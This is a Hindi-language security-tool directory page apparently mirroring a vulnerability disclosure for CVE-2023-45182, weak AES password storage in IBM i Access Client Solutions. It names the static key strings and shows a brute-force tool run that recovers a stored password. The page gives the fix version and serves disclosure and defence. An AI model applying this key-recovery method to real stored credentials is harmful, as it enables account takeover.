Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-45182 — IBM i Access Client Solutions < 1.1.9.4 - कमजोर पासवर्ड एन्क्रिप्शन | Kitploit
उपकरण/GitHubGitHub/afine-com/cve-2023-45182
पासवर्ड क्रैकिंगएन्क्रिप्शन/डिक्रिप्शन उपकरणभेद्यता विश्लेषणशोषणक्रिप्टोग्राफी
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - कमजोर पासवर्ड एन्क्रिप्शन

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - कमज़ोर पासवर्ड एन्क्रिप्शन

समयरेखा

  • विक्रेता को भेद्यता की सूचना दी गई: 22.09.2023
  • नया फिक्स्ड संस्करण 1.1.9.4 जारी किया गया: 08.12.2023
  • सार्वजनिक खुलासा: 15.12.2023

विवरण

IBM i Access Client Solutions उपयोगकर्ता पासवर्ड संग्रहीत करने के लिए AES एल्गोरिथ्म का उपयोग करता है, हालाँकि 16 बाइट्स की एन्क्रिप्शन कुंजी स्थिर स्ट्रिंग (Thanatos) और एक अन्य स्थिर स्ट्रिंग (Behemoth) से युक्त स्ट्रिंग से यादृच्छिक वर्णों का संयोजन है, जो उपयोगकर्ता नाम, उपयोगकर्ता के होम फ़ोल्डर, ओएस (उदाहरण के लिए Linux) और वर्तमान निर्देशिका के साथ संयुक्त होती है जहाँ एप्लिकेशन शुरू किया गया था। परिणामस्वरूप, एन्क्रिप्शन कुंजी का आधा भाग स्थिर (स्ट्रिंग Thanatos) होता है जबकि दूसरा आधा भाग बहुत सीमित होता है। इससे किसी हमलावर के लिए एकल CPU कोर पर भी पासवर्ड ब्रूट फोर्स करना बहुत आसान हो जाता है।

यहाँ mkubiak खाते से as400_password_bruteforce_tool.java स्क्रिप्ट का उपयोग करके mmajchrowicz उपयोगकर्ता के पासवर्ड डिक्रिप्शन का एक उदाहरण दिया गया है:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

यह समस्या कमज़ोर पासवर्ड एन्क्रिप्शन के अनुप्रयोग के कारण हुई थी। यह मुद्दा IBM i Access Client Solutions 1.1.9.4 में ठीक कर दिया गया है।

प्रभावित संस्करण

< 1.1.9.4

सलाह

IBM i Access Client Solutions को 1.1.9.4 या नए संस्करण में अपडेट करें।

संदर्भ

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
टूल डाउनलोड करें